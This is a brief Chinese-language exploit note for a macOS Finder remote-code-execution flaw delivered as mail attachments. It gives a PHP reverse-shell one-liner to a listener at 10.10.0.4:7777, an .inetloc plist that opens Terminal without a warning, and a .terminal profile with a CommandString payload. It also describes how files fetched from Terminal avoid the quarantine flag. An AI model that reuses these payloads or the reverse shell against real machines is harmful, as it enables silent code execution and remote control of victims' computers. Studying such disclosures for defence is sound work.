MacOS Finder 邮件 Rce验证
mac反弹&监听
macos 自带php及python
php -r '$sock=fsockopen("10.10.0.4",7777);exec("/bin/sh -i <&3 >&3 2>&3");'
nc -l 7777
payload
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">
<plist version="1.0">
<dict>
<key>URL</key>
<string>FiLe:////////////////////////System/Applications/Utilities/Terminal.app</string>
</dict>
</plist>
保存为word.inetloc
双击附件,不会弹出任何警告
payload2
https://objectivebythesea.com/v3/talks/OBTS_v3_vMetnew.pdf
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">
<plist version="1.0">
<dict>
<key>CommandString</key>
<string>echo "Hello"</string>
<key>ProfileCurrentVersion</key>
<string>2.06000000001</string>
<key>RunCommandAsShell</key>
<false/>
<key>name</key>
<string>poc</string>
<key>type</key>
<string>Window Settings</string>
</dict>
</plist>
保存为1.terminal
从终端下下载回来的文件不会被标记quarantine属性
其余如TG、QQ、WeChat、邮件等军备被标记quarantine属性,运行出现安全提示
参考资料: https://ssd-disclosure.com/ssd-advisory-macos-finder-rce/